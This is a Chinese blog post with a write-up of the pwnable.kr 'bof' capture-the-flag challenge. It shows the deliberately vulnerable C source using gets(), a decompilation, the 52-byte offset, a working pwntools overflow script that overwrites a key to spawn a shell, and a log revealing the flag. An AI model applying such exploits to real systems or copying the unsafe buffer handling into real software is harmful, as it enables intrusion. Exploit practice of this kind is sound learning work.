【pwnable.kr】day3：bof

最新推荐文章于 2021-02-03 22:04:16 发布

食兔人

最新推荐文章于 2021-02-03 22:04:16 发布

阅读量261

点赞数

分类专栏： ctf pwn 文章标签： ctf pwn

本文链接：https://blog.csdn.net/weixin_38312031/article/details/84967725

版权

ctf 同时被 2 个专栏收录

10 篇文章 0 订阅

订阅专栏

pwn

9 篇文章 0 订阅

订阅专栏

pwnable：bof

pwnable.kr：bof 题目链接

question

Nana told me that buffer overflow is one of the most common software vulnerability. 
Is that true?

Download : http://pwnable.kr/bin/bof
Download : http://pwnable.kr/bin/bof.c

Running at : nc pwnable.kr 9000

先看下文件，然后nc上去进行数据输入

bof.c

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void func(int key){
	char overflowme[32];
	printf("overflow me : ");
	gets(overflowme);	// smash me!
	if(key == 0xcafebabe){
		system("/bin/sh");
	}
	else{
		printf("Nah..\n");
	}
}
int main(int argc, char* argv[]){
	func(0xdeadbeef);
	return 0;
}

analyse

把bof拖进IDA里看下

unsigned int __cdecl func(int a1)
{
  char s; // [esp+1Ch] [ebp-2Ch]
  unsigned int v3; // [esp+3Ch] [ebp-Ch]

  v3 = __readgsdword(0x14u);
  puts("overflow me : ");
  gets(&s);
  if ( a1 == -889275714 )
    system("/bin/sh");
  else
    puts("Nah..");
  return __readgsdword(0x14u) ^ v3;
}

在main函数调用func时，留出位置给key，所以让buffer溢出到key，填入0xcafebabe即可。IDA告诉我们s的位置位于ebp-2Ch处，而key的位置在ebp+8h处。中间要填上52个字节。

get flag

写python脚本如下：

from pwn import *
ssh = remote("pwnable.kr",9000)
payload = "a"*52+p32(0xcafebabe)
ssh.send(payload)
ssh.interactive()

运行

ubuntu@VM-0-3-ubuntu:~$ python bof.py 
[+] Opening connection to pwnable.kr on port 9000: Done
[*] Switching to interactive mode
$ ls
bof
bof.c
flag
log
log2
super.pl
$ cat flag
daddy, I just pwned a buFFer :)
$ 
[*] Closed connection to pwnable.kr port 9000

flag:daddy, I just pwned a buFFer :)

食兔人

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
【pwnable.kr】day3：bof

pwnable：bofpwnable.kr：bof 题目链接questionNana told me that buffer overflow is one of the most common software vulnerability. Is that true?Download : http://pwnable.kr/bin/bofDownload : http://pwna...
复制链接

扫一扫